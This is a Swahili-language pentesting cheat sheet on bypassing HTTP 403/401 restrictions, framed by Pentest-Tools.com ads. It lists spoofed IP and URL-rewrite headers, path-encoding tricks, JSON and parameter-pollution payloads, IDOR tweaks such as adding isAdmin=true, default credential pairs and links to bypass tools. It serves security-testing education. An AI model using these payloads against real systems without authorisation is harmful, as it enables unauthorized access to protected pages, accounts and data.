Usanidi wa papo hapo wa upimaji wa udhaifu & udukuzi wa mtandao. Tekeleza udukuzi kamili kutoka mahali popote na zana na vipengele zaidi ya 20 vinavyoanzia uchunguzi hadi ripoti. Hatuchukui nafasi ya wadukuzi - tunatengeneza zana za desturi, ugunduzi & moduli za kutumia ili kuwarudishia muda wa kuchimba kwa kina, kuvunja makompyuta, na kufurahi.

Pentest-Tools.com | 25+ Online Penetration Testing ToolsPentest-Tools.com

Kufanya Majaribio ya Maneno/Methodi za HTTP

Jaribu kutumia methodi tofauti kufikia faili: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK

• Angalia vichwa vya majibu, labda taarifa fulani inaweza kutolewa. Kwa mfano, majibu ya 200 kwa HEAD na Content-Length: 55 inamaanisha kwamba methodi ya HEAD inaweza kupata taarifa. Lakini bado unahitaji kupata njia ya kutoa taarifa hiyo.

• Kutumia kichwa cha HTTP kama X-HTTP-Method-Override: PUT inaweza kubadilisha methodi iliyotumika.

• Tumia methodi ya TRACE na ikiwa una bahati labda katika majibu unaweza pia kuona vichwa vilivyoongezwa na wakalisha wa kati ambavyo vinaweza kuwa na manufaa.

Kufanya Majaribio ya Vichwa vya HTTP

• Badilisha kichwa cha Mwenyeji kwa thamani isiyojulikana (ambayo ilifanya kazi hapa)

• Jaribu kutumia Wageni wengine wa Mtumiaji kufikia rasilimali.

• Fanya majaribio ya Vichwa vya HTTP: Jaribu kutumia Vichwa vya HTTP vya Proxi, Uthibitishaji wa Msingi wa HTTP na NTLM nguvu ya kufanya kazi (na mchanganyiko wa kidogo tu) na njia nyingine. Kufanya haya yote nimeunda zana fuzzhttpbypass.

• X-Originating-IP: 127.0.0.1

• X-Forwarded-For: 127.0.0.1

• X-Forwarded: 127.0.0.1

• Forwarded-For: 127.0.0.1

• X-Remote-IP: 127.0.0.1

• X-Remote-Addr: 127.0.0.1

• X-ProxyUser-Ip: 127.0.0.1

• X-Original-URL: 127.0.0.1

• Client-IP: 127.0.0.1

• True-Client-IP: 127.0.0.1

• Cluster-Client-IP: 127.0.0.1

• X-ProxyUser-Ip: 127.0.0.1

• Host: localhost

Ikiwa njia imekingwa unaweza jaribu kukiuka ulinzi wa njia kwa kutumia vichwa vifuatavyo:

• X-Original-URL: /admin/console

• X-Rewrite-URL: /admin/console

• Ikiwa ukurasa uko nyuma ya proxi, labda ni proxi ndiyo inayokuzuia kupata taarifa za siri. Jaribu kutumia Udukuzi wa Ombi la HTTP au vichwa vya hatua kwa hatua.

• Fanya majaribio ya vichwa maalum vya HTTP ukitafuta majibu tofauti.

• Fanya majaribio ya vichwa maalum vya HTTP wakati wa kufanya majaribio ya Methodi za HTTP.

• Ondoa kichwa cha Mwenyeji na labda utaweza kukiuka ulinzi.

Kufanya Majaribio ya Njia

Ikiwa /njia imezuiliwa:

• Jaribu kutumia /%2e/njia _(ikiwa ufikiaji umefungwa na proxi, hii inaweza kukiuka ulinzi). Jaribu pia_** /%252e**/njia (URL encode mara mbili)

• Jaribu kukiuka Unicode: /%ef%bc%8fnjia (Vichwa vilivyofungwa vya URL ni kama "/") kwa hivyo wakati inarudishwa itakuwa //njia na labda tayari umeshavuka ukaguzi wa jina la /njia

• Kukiuka njia nyingine:

• tovuti.com/siri –> HTTP 403 Imezuiwa

• tovuti.com/SIRI –> HTTP 200 Sawa

• tovuti.com/siri/ –> HTTP 200 Sawa

• tovuti.com/siri/. –> HTTP 200 Sawa

• tovuti.com//siri// –> HTTP 200 Sawa

• tovuti.com/./siri/.. –> HTTP 200 Sawa

• tovuti.com/;/siri –> HTTP 200 Sawa

• tovuti.com/.;/siri –> HTTP 200 Sawa

• tovuti.com//;//siri –> HTTP 200 Sawa

• tovuti.com/siri.json –> HTTP 200 Sawa (ruby)

• Tumia orodha hii yote katika hali zifuatazo:

• /FUZZsiri

• /FUZZ/siri

• /siriFUZZ

• Kukiuka API nyingine:

• /v3/watumiaji_data/1234 --> 403 Imezuiwa

• /v1/watumiaji_data/1234 --> 200 Sawa

• {“id”:111} --> 401 Haujaidhinishwa

• {“id”:[111]} --> 200 Sawa

• {“id”:111} --> 401 Haujaidhinishwa

• {“id”:{“id”:111}} --> 200 Sawa

• {"user_id":"<legit_id>","user_id":"<victims_id>"} (Uchafuzi wa Parameta ya JSON)

• user_id=ID_YA_SHAMBULIZI&user_id=ID_YA_MWATHIRIWA (Uchafuzi wa Parameta)

Ubadilishaji wa Parameta

• Badilisha thamani ya parameta: Kutoka id=123 --> id=124

• Ongeza parameta zaidi kwenye URL: ?id=124 —-> id=124&isAdmin=true

• Ondoa parameta

• Badilisha mpangilio wa parameta

• Tumia herufi maalum.

• Fanya majaribio ya mipaka kwenye parameta — toa thamani kama vile -234 au 0 au 99999999 (mfano wa thamani).

Toleo la Itifaki

Ikiwa unatumia HTTP/1.1 jaribu kutumia 1.0 au hata jaribu kama ina unga mkono 2.0.

Bypassing Nyingine

• Pata IP au CNAME ya kikoa na jaribu kuwasiliana moja kwa moja.

• Jaribu kuhujumu seva kwa kutuma maombi ya kawaida ya GET (Ilifanya kazi kwa mtu huyu na Facebook).

• Badilisha itifaki: kutoka http kwenda https, au kutoka https kwenda http

• Nenda kwenye https://archive.org/web/ na angalia kama hapo awali faili hiyo ilikuwa inapatikana ulimwenguni.

Mashambulizi ya Nguvu

• Ghaili nywila: Jaribu nywila za kawaida zifuatazo. Je, unajua kitu kuhusu muathiriwa? Au jina la changamoto ya CTF?

• Mashambulizi ya Nguvu: Jaribu uthibitishaji wa msingi, wa digest na wa NTLM.

admin    admin
admin    password
admin    1234
admin    admin1234
admin    123456
root     toor
test     test
guest    guest

Zana za Kiotomatiki

• https://github.com/lobuhi/byp4xx

• https://github.com/iamj0ker/bypass-403

• https://github.com/gotr00t0day/forbiddenpass

• Burp Extension - 403 Bypasser

• Forbidden Buster

Usanidi wa papo hapo wa upimaji wa udhaifu & uchunguzi wa kuingilia. Tekeleza pentest kamili kutoka mahali popote na zana na vipengele zaidi ya 20 vinavyoanzia uchunguzi hadi ripoti. Hatuchukui nafasi ya wapimaji wa pentesting - tunatengeneza zana za desturi, moduli za ugunduzi & uchexploitation ili kuwarudishia muda wa kuchimba kwa kina, kuzindua shells, na kufurahi.